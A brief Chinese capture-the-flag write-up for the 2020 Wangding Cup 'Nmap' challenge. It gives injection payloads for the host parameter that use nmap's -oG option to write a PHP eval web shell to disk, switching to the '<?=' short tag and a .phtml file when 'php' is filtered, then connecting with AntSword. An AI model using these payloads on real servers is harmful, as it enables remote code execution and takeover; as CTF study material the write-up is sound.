[网鼎杯 2020 朱雀组]Nmap 考nmap的用法,但是我不会 用上次online tool的payload ?host=' <?php @eval($_POST["cmd"]);?> -oG yjh.php ' 回显hacker 猜测是过滤了php ?host=' <?= @eval($_POST["cmd"]);?> -oG yjh.phtml ' 这样可以蚁剑连,也可以post一个命令 https://www.bilibili.com/video/av795863875/